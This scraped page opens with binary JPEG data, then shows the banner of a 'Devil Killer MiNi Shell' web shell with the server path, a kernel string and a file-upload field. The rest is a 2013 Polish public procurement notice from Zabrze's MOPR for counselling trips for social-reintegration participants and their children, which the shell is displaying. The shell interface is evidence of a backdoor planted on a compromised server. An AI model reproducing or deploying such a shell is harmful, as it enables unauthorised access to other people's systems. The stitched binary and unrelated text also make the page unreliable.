JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130927/392424-N-2013.html

<p class="kh_header"><b>Zabrze: Wyjazdowe poradnictwo i wsparcie indywidualne i grupowe w zakresie podniesienia kompetencji życiowych i umiejętności społeczno zawodowych dla uczestników (uczestniczek) projektu Reintegracja. Aktywność. Praca. Program na rzecz integracji społeczno - zawodowej w gminie Zabrze.</b><br>
<b>Numer ogłoszenia: 392424 - 2013; data zamieszczenia: 27.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. 3 Maja 16, 41-800 Zabrze, woj. śląskie, tel. 32 2777800, faks 32 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyjazdowe poradnictwo i wsparcie indywidualne i grupowe w zakresie podniesienia kompetencji życiowych i umiejętności społeczno zawodowych dla uczestników (uczestniczek) projektu Reintegracja. Aktywność. Praca. Program na rzecz integracji społeczno - zawodowej w gminie Zabrze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
organizacja i przeprowadzenie wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno zawodowych dla uczestników (uczestniczek) projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze, zwanego dalej wsparciem. 
UCZESTNICY
W szkoleniu weźmie udział od 45 do 65 uczestników (uczestniczek) projektu systemowego  oraz koordynator ze strony MOPR. Ponadto w wyjeździe będą brały udział dzieci uczestników (uczestniczek) szkolenia w łącznej liczbie minimum 55 maksimum 85. Zamawiający przewiduje 1 grupę wyjazdową. W przypadku gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie wsparcia dla liczby osób wskazanych w SIWZ, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na wsparcie.
DZIECI
Na czas trwania wsparcia zostanie również zapewniona opieka nad dziećmi uczestników (uczestniczek)  podczas wyjazdu w łącznej liczbie minimum 55 maksimum 85. Dzieci uczestników (uczestniczek) szkolenia będą miały zapewnione zakwaterowanie z rodzicem (opiekunem) oraz wyżywienie(po pół porcji w przypadku dzieci do lat 12)
Zamawiający przewiduje udział dzieci w nw. grupach 
Grupa najmłodsza tj. dzieci w wieku ( 0 3)
Grupa przedszkolna tj. dzieci w wieku (4  6 lat)
Grupa wczesnoszkolna tj. dzieci w wieku ( 7  11)
Grupa szkolna tj. dzieci w wieku (12 17)
Opieka  będzie zapewniona  w sposób dostosowany do ich wieku i sprawowana przez doświadczoną kadrę. Opieka winna być sprawowana w miarę jednolitych grupach wiekowych. Dzieci powinny mieć zapewnione dodatkowe atrakcje przy uwzględnieniu warunków atmosferycznych (zabawy ruchowe na powietrzu, spacer, zajęcia plastyczne, ruchowe na terenie ośrodka). 
KADRA ZAPEWNIONA PRZEZ ZAMAWIAJĄCEGO
1 koordynator grupy ze strony Zamawiającego w celu nadzoru nad realizacją przedmiotu umowy.
CEL
Nabycie i zwiększenie przez uczestnika (uczestniczkę)  projektu pozytywnej autoprezentacji i uświadomienie ważności dbania o higienę i własny wizerunek w życiu codziennym. Zwiększenie możliwości w obszarze poszukiwania pracy.
PROGRAM
Program wsparcia powinien zawierać m.in. zagadnienia dotyczące
zbudowanie gradacji własnych możliwości zawodowych
ustalenie możliwości zaistnienia na rynku pracy
nauka skutecznej autoprezentacji (komunikacja werbalna i niewerbalna)
nauka kształtowania własnego wizerunku
przygotowanie na krytykę, zachowanie w sytuacji niepowodzenia bądź stresu
Szczegółowy program wsparcia powinien zawierać wyżej przedstawione zagadnienia i być przedstawiony Zamawiającemu do akceptacji przed jego realizacją. Powinny się tam znaleźć miejsce realizacji (dokładny adres), nazwę szkolenia, czas trwania i sposób organizacji zajęć, cel wsparcia, plan wsparcia zawierający nazwę zajęć oraz ich wymiar zgodny z zamówieniem.
Wsparcie musi zakończyć się wydaniem uczestnikom (uczestniczkom) zaświadczenia o ukończeniu  wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno  zawodowych wraz z informacją o współfinansowaniu projektu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.
FORMA 
 Wsparcie składać się będzie z dwóch wyjazdów weekendowych od piątku do niedzieli. 
Jeden wyjazd weekendowy obejmować będzie 3 dniowy pobyt w ośrodku wypoczynkowym od piątku do niedzieli, w tym dwa noclegi,  15 godzin szkoleniowych  treningowych zgodnych z zatwierdzonym harmonogramem. Przez 1 godzinę szkoleniową  Zamawiający rozumie 45 minut. Uczestnicy (uczestniczki) wsparcia zostaną podzieleni na 15-osobowe grupy treningowe (+ - 2 osoby). Każda z grup powinna mieć zapewnionego trenera grupy, psychologa lub psychoterapeutę.
KADRA ZAPEWNIANA PRZEZ WYKONAWCĘ
a)  Kierownik  opiekun wyjazdu. Zadaniem kierownika (opiekuna) będzie m.in. organizacja czasu wolnego i wypoczynku, zapewnienie bezpieczeństwa uczestników, prowadzenie rozmów, ewentualne załatwianie z Ośrodkiem problemów typu organizacyjnego. Kierownik musi koordynować wyjazd z Zabrza do miejsca pobytu i z powrotem poprzez przeprowadzenie zbiórki, rozmieszczenie osób w autokarze, opiekę podczas jazdy i postojów.
b)  Trener Psycholog lub psychoterapeuta  do prowadzenia zajęć w zakresie poradnictwa i wsparcia indywidualnego i grupowego  w liczbie umożliwiającej przeprowadzenie zajęć w grupach 15-osobowych (+ - 2 osoby)  minimum 3 osoby  max. 5 osób
c)opiekun (opiekunka) w liczbie umożliwiającej zapewnienie opieki zgodnie z wymaganiami Zamawiającego
średnio - 1 osoba na 5 dzieci tj. minimum 11 opiekunów (opiekunek)  max. 17 opiekunów (opiekunek)
MIEJSCE
Wyjazdy odbędą się np. w Ustroniu, Korbielowie, Szczyrku lub innej miejscowości górskiej atrakcyjnej pod względem turystycznym  maksymalnie w odległości 150 km od siedziby Zamawiającego (na warunkach określonych z Zamawiającym) zgodnie z uzgodnionym minimum 7 dni przed wyjazdem  harmonogramem. 
TERMIN
Piątek, sobota, niedziela w okresie od 8 listopada do 8 grudnia 2013 r.
Terminy wyjazdów zostaną indywidualnie ustalone z pracownikiem MOPR.
SALA, MATERIAŁY, WARUNKI SZKOLENIOWE Wykonawca zobowiązany jest do zapewnienia podczas zajęć wyposażenia dydaktycznego, odpowiadającego obowiązującemu stanowi prawnemu i poziomowi techniki oraz do udostępnienia uczestnikom (uczestniczkom) wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia wsparcia. Pomieszczenia mają być dostosowane do prowadzenia zajęć i odpowiednio w tym celu wyposażone, tj. pomieszczenia muszą posiadać odpowiednie warunki sanitarne, akustyczne oraz spełniać warunki bezpieczeństwa.
Wsparcie musi zakończyć się wydaniem uczestnikom (uczestniczkom)  zaświadczenia o ukończeniu wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno zawodowych dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze Jeżeli nie będzie możliwości zamieszczenia odpowiedniej informacji na zaświadczeniu  wydanie dodatkowego zaświadczenia zawierającego tę informację.
Zaliczenie wsparcia przez  pojedynczego uczestnika (uczestniczkę)  projektu oznacza otrzymanie zaświadczenia o jego zakończeniu.
Wykonawca zobowiązany jest do zapewnienia uczestnikom wszelkich materiałów szkoleniowych niezbędnych do przeprowadzenia wsparcia  oraz przekazania jednego dodatkowego egzemplarza materiałów szkoleniowych do dokumentacji projektu.
TRANSPORT
Wykonawca zapewni dojazd z miejsca zamieszkania i powrót do miejsca zamieszkania (bilety na komunikację miejską) na wcześniej umówione miejsce zbiórki wsparcia wyjazdowego, z którego nastąpi wyjazd (wyjazd nastąpi w piątek w godzinach popołudniowych przyjazd powinien nastąpić w niedzielę w godzinach wieczornych) luksusowym autokarem  wyposażonym w odpowiednią do ilości grupy wyjazdowej liczbę miejsc siedzących. 
OŚRODEK (ZAKWATEROWANIE)  Wsparcie winno być realizowane w komfortowym Ośrodku z jadłodajnią, salami do realizacji zajęć oraz miejscem do spędzania wolnego czasu przez uczestników (uczestniczki) w ramach zajęć integracyjnych. Powinno też być zapewnione miejsce do zabaw i spędzania czasu dla dzieci. 
Ośrodek nie może być pensjonatem, kwaterą, gospodarstwem agroturystycznym itp.
Zakwaterowanie powinno być zapewnione w pokojach 2 3 osobowych z łazienkami, dostępem do TV w każdym pokoju. Uczestnicy (uczestniczki) powinni zostać zakwaterowani ze względu na płeć oraz razem z dziećmi,  a w przypadku nieparzystej liczby osób zapewniony zostanie dodatkowo pokój jednoosobowy. Rodziny wielodzietne powinny zostać zakwaterowane razem lub, jeżeli nie ma takiej możliwości, w pokojach obok siebie. W pokojach powinna być zagwarantowana dobrej jakości  woda mineralna gazowana i niegazowana w butelkach w ilości 1 l na osobę przebywającą w pokoju  każdego dnia pobytu.
UWAGA
Zajęcia, zakwaterowanie, wyżywienie oraz sprawowanie opieki nad dziećmi musi  być zapewnione w ramach jednego obiektu.
WYŻYWIENIE:
Wykonawca zapewnieni 3 pełne posiłki  tj.
śniadanie w formie szwedzkiego stołu np. ( pieczywo, jajka, dżemy, wędliny-różne rodzaje, sery, jogurty, kiełbaski na ciepło, warzywa i owoce sezonowe, ciepłe napoje  itp., ), 
obiad - dwudaniowy składający się z zupy ok. 500ml na osobę, sztuka mięsa ok.200g, ziemniaki (frytki, ryż itp.) oraz sałatki (surówki), napoje (sok, kompot, woda) oraz deser (budyń lub drożdżówka lub lody lub ciasto itp.), 
kolacja - na ciepło np. fasolka, bogracz, bigos, grochówka, gulasz itp.  z pieczywem i napojami gorącymi. 
W dniu wieczoru  integracyjnego Wykonawca nie zapewnia kolacji, zamiast tego serwuje kiełbasę z grilla ok. 200gr. na osobę, pieczywo, napoje (soki, woda) i inne dodatki typu ogórek, smalec itp., a także musztardę i keczup.
suchy prowiant w dniach wyjazdu i przyjazdu dla dorosłych i dzieci tj. bułka z serem, szynką, pomidorem lub ogórkiem, owoc, napój ze słomką dla dzieci, dla dorosłych 0,5l dobrej jakości wody niegazowanej mineralnej. 
drobny poczęstunek -  stały dostęp do  kawy i herbaty dobrej jakości oraz  kruche ciastka, paluszki, krakersy itp. wyłożone na stołach ze stałym dostępem w trakcie przerw między zajęciami oraz drobnego poczęstunku oraz napoi  soki dla dzieci.
UWAGA wszystkie posiłki mają być podane uczestnikom i dzieciom (pół porcji w przypadku dzieci do lat 12)
ZAPŁATA
Zamawiający zapłaci za zgłoszonych pisemnie uczestników (uczestniczki) wyjazdu, którzy ukończyli pełne wsparcie wyjazdowe ( dwa wyjazdy). Zamawiający dopuszcza zrealizowanie płatności za uczestnika, który nie ukończył  pełnego wsparcia  uczestniczył tylko w jednym wyjeździe. Płatność nastąpi proporcjonalnie, tzn. Zamawiający pokryje połowę kosztu udziału uczestnika.
Zamawiający ze względu na specyfikę przedmiotu zamówienia nie jest w stanie dokładnie sprecyzować ilości uczestników (uczestniczek) wsparcia i ich dzieci mogących wziąć udział w wyjeździe. Zamawiający winien dokonać kalkulacji zgodnie z podanymi ramami ilościowymi uczestników (uczestniczek) dzieci (dotyczy to także liczby potrzebnych trenerów i opiekunów).
Opłata klimatyczna  Wykonawca uwzględni w cenie oferty opłatę klimatyczną dla wszystkich biorących udział w wyjeździe jeśli jej naliczanie związane jest z miejscem pobytu.
CZAS WOLNY - ZAJĘCIA INTEGRACYJNE 
Wykonawca zorganizuje czas wolny od zajęć uczestnikom (uczestniczkom) oraz dzieciom w sposób atrakcyjny tj. zapewni przynajmniej 1 wieczór integracyjny z muzyką na żywo, ogniskiem (grillem), zabawami i konkursami, a w przypadku nie sprzyjających warunków atmosferycznych alternatywną formę integracji. Wykonawca zapewni konkursy w liczbie 3 dla dorosłych i 3 dla dzieci oraz nagrody do kwoty (ok. 20zł za 1-sze miejsce,ok.15 zł za drugie miejsce,ok.10 zł za 3 miejsce).
POSTANOWIENIA DODATKOWE
1. zapewnienie ubezpieczenia NNW, każdego uczestnika (uczestniczki) wsparcia oraz dzieci podczas wyjazdu na kwotę 10000,00 zł na 1 osobę
2. zapewnienie oznakowania pomieszczeń w których będą odbywały się zajęcia oraz wszelkich dokumentów związanych z realizacją wsparcia oraz na materiałach przekazywanych uczestnikom (uczestniczkom) w trakcie zajęć
3. przedstawienie szczegółowego programu  wsparcia, który musi zawierać zagadnienia opisane w przedmiocie zamówienia i winien być przedstawiony Zamawiającemu do akceptacji przed realizacją wsparcia w terminie 7 dni roboczych przed planowanym terminem rozpoczęcia. Harmonogram powinien zawierać: miejsce realizacji (dokładny adres), nazwa zajęć, czas trwania i sposób organizacji zajęć, cel zajęć, plan zajęć zawierający nazwę zajęć oraz ich wymiar zgodny z zamówieniem
4. zapewnienie po zakończeniu wsparcia zaświadczenia o ukończeniu  wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych dla uczestników (uczestniczek) projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze. 
Zaliczenie wsparcia przez uczestnika (uczestniczkę) projektu oznacza otrzymanie zaświadczenia o zakończeniu wsparcia i wymaga obecności na obu wyjazdach. Zamawiający dopuszcza możliwość otrzymania przez uczestnika (uczestniczkę) zaświadczenia o ukończeniu wsparcia w zakresie realizacji 100 procent programu treningowego, a poniżej tej granicy uczestnik (uczestniczka) otrzyma potwierdzenie uczestnictwa w danej części wsparcia.
5. zapewnienie bezpłatnego pobytu koordynatora grupy ze strony Zamawiającego w pokoju 1 -osobowym z łazienką 
6. zamawiający dopuszcza realizację wyjazdów w różnych ośrodkach wypoczynkowych oraz miejscowościach i salach szkoleniowych z zastrzeżeniem, iż wyjazdy odbywać się będą w ośrodkach o zbliżonym standardzie  świadczonych usług lub lepszych
7. zamawiający ze względu na specyfikę przedmiotu zamówienia nie jest w stanie dokładnie sprecyzować ilości uczestników (uczestniczek) wsparcia i ich dzieci mogących wziąć w nim udział. Wykonawca winien dokonać kalkulacji zgodnie z podanymi ramami ilościowymi uczestników (uczestniczek) i dzieci (dotyczy to także liczby potrzebnych trenerów i opiekunów).
8. opłata klimatyczna - Wykonawca uwzględni w cenie oferty opłatę klimatyczną dla wszystkich biorących udział w wyjeździe jeśli jej naliczanie związane jest z miejscem pobytu
9. przedstawienie na 7 dni przed datą rozpoczęcia kursu szczegółowego programu wsparcia, który musi zawierać zagadnienia wymagane przepisami prawa. Harmonogram w szczególności powinien zawierać: miejsce realizacji wsparcia (dokładny adres), program wsparcia, czas trwania całego wsparcia z podziałem liczby wszystkich uczestników kursu na grupy szkoleniowe. Ponadto, najdalej do dnia rozpoczęcia kursu (szkolenia) Wykonawca powinien dostarczyć Zamawiającemu np. faksem potwierdzenie ubezpieczenia NNW uczestników (uczestniczek), a po zakończeniu szkolenia jego kserokopię,
PROMOCJA OZNAKOWANIE DOKUMENTACJA
Wykonawcy zobowiązani są do: 
1. promowania Unii Europejskiej, Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Kapitał Ludzki między innymi poprzez umieszczenie w miejscu odbywania wsparcia, na dokumentacji dotyczącej przebiegu realizacji wsparcia, na materiałach szkoleniowych oraz przedmiotach niezbędnych do realizacji przedmiotu umowy w sprawie zamówienia informacji Wyjazdowe poradnictwo i wsparcie indywidualne i grupowe w zakresie podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych dla uczestników  projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze  oraz oznaczenia logo EFS, Unii Europejskiej i logo PO KL zgodnie z zasadą wizualizacji dostępną na stronie www.efs.silesia-region.pl w zakładce promocja
2. wykonawca w ramach wsparcia zobowiązuje się do prowadzenia pełnej dokumentacji z przebiegu wsparcia, obejmującej dla każdego wsparcia:
a.	program
b.	prowadzenie kart przeprowadzonych zajęć (zawierających listę obecności, wymiar godzin i tematy zajęć edukacyjnych)
c.	potwierdzenie otrzymania cateringu (z podziałem na dni) 
d.	rejestr wydanych zaświadczeń potwierdzających ukończenie wsparcia
e.	potwierdzenie odbioru biletów na dojazd
f.	opinia o uczestnikach
		       g.	potwierdzenie otrzymania materiałów dydaktycznych
		       h.	polisy ubezpieczeniowej
	           i.    listy potwierdzającej obecność dzieci w wyjeździe 			
Powyższe dokumenty oryginały (kopie) Wykonawca przekaże Zamawiającemu w celu potwierdzenia przeprowadzenia wsparcia. Ponadto Wykonawca dokona archiwizacji ww dokumentów na okres do 31.12.2020r., zapewniając dostęp do przechowywanej dokumentacji w ramach kontroli wykonania przedmiotu zamówienia. Wszystkie dokumenty sporządzane przez Wykonawcę będą opatrzone logotypami projektu systemowego
3. umieszczać logo POKL, logo EFS, emblemat Unii Europejskiej oraz informację o tym, iż dane zajęcia odbywają się w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego związanych z realizacją przedmiotu zamówienia.
4. W miejscu organizacji zajęć oraz na materiałach dydaktycznych umieszczać logo POKL, logo EFS, emblematu Unii Europejskiej oraz informacji o tym, iż wsparcie odbywa się w ramach projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego (obowiązujące logotypy dostępne są na stronie http:efs.silesia-region.pl).
5. Ww informacje muszą zawierać :
a.	znak Kapitał Ludzki Narodowa Strategia Spójności 
b.	flagę Unii Europejskiej Europejski Fundusz Społeczny
c.	pełną nazwę projektu i informację o współfinansowaniu:
Reintegracja. Aktywność. Praca. Program na  rzecz integracji
społeczno-zawodowej w gminie Zabrze.
Projekt współfinansowany przez Unię Europejską w ramach
Europejskiego Funduszu Społecznego
6. Wydać uczestnikowi (uczestniczce) oryginał zaświadczenia (poświadczenie) o ukończeniu wsparcia zawierającego informację o realizowaniu wyjazdowego poradnictwa i wsparcia indywidualnego i grupowego  w zakresie podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych dla uczestników  projektu systemowego współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, kopię ww zaświadczenia Wykonawca zobowiązuje się wydać Zamawiającemu. Jeżeli nie ma możliwości zamieszczenia odpowiedniej informacji na zaświadczeniu -  wydać dodatkowe zaświadczenie zawierające wskazaną informację.
7. Przekazać Zamawiającemu po zakończeniu wsparcia wszelkie dokumenty oryginały/kopie w celu potwierdzenia realizacji przedmiotu umowy
Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom. (prosimy o dołączenie do oferty załącznika nr 5 do SIWZ).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczeń</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczeń</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczeń</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
